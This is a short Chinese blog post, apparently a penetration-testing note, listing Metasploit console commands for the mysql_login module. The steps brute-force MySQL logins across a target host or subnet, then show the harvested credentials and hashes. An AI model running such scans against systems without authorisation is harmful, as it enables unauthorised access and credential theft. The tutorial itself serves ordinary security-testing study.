美文网首页
2018-11-22 metasploit 框架mysql_lo

2018-11-22 metasploit 框架mysql_lo

作者: 昨天今天下雨天1 | 来源:发表于2018-11-22 13:34 被阅读0次

    msf > search mysql_login (搜索mysql_login模块(针对mysql进行暴力破解))


    image.png

    msf > use xxxxx/mysql_login (使用该模块)
    msf > show options (查看模块配置)
    msf > set RHOSTS xxx.xxx.xxx.xxx 或xxx.xxx.xxx.0/24 (指定目标)
    msf > run / exploit (运行模块)
    msf > creds (查看数据)
    msf > loot (查看hash数据)

    相关文章

      网友评论

          本文标题:2018-11-22 metasploit 框架mysql_lo

          本文链接:https://www.haomeiwen.com/subject/bhllqqtx.html